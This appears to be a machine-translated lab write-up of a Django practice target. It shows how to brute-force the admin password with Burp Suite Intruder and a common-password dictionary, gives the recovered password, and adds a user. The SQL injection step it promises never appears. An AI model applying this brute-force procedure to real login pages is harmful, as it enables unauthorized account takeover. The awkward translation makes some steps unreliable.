Mainly investigate password blasting
Django靶场Django: the Web framework for perfectionists with deadlines.
Require:
SQL injection test questions, using the vulnerability django-cve_2019_14234, write a file named after your class name into the system.
1. Enter the shooting range and the interface will appear.
Use the function authenticucate (authentication client) to authenticate existing users
As can be seen from the figure below, there is user admin
2. User login
Login interface URL Log in | Django site admin
Enter the login interface, known information user admin unknown information password
Blasting with Burpsuite Pro
2.1Burpsuite Explosion
Enable local proxy function 127.0.0.1:8080
Use the Firefox browser plug-in Foxyproxy to enable the proxy function
Return to the login interface of the shooting range to enable the agent to capture packets.
Information obtained by Burpsuite
Right-click Send to Intruder , and then enter the position interface
Clear on the right clears the variable and retains the variable password. The blasting method is sniper.
Entering the payload interface, I chose to use dictionary blasting. I downloaded a dictionary of 6,000 commonly used passwords. If you need to use it, please go to the official website to download it.
Click load.. to load the downloaded dictionary on the desktop
Blasting begins in the upper right corner
According to the length observation, the password is a123123123
Log in | Django site admin
3. Inject user information
Add useruser
Add user information
Added successfully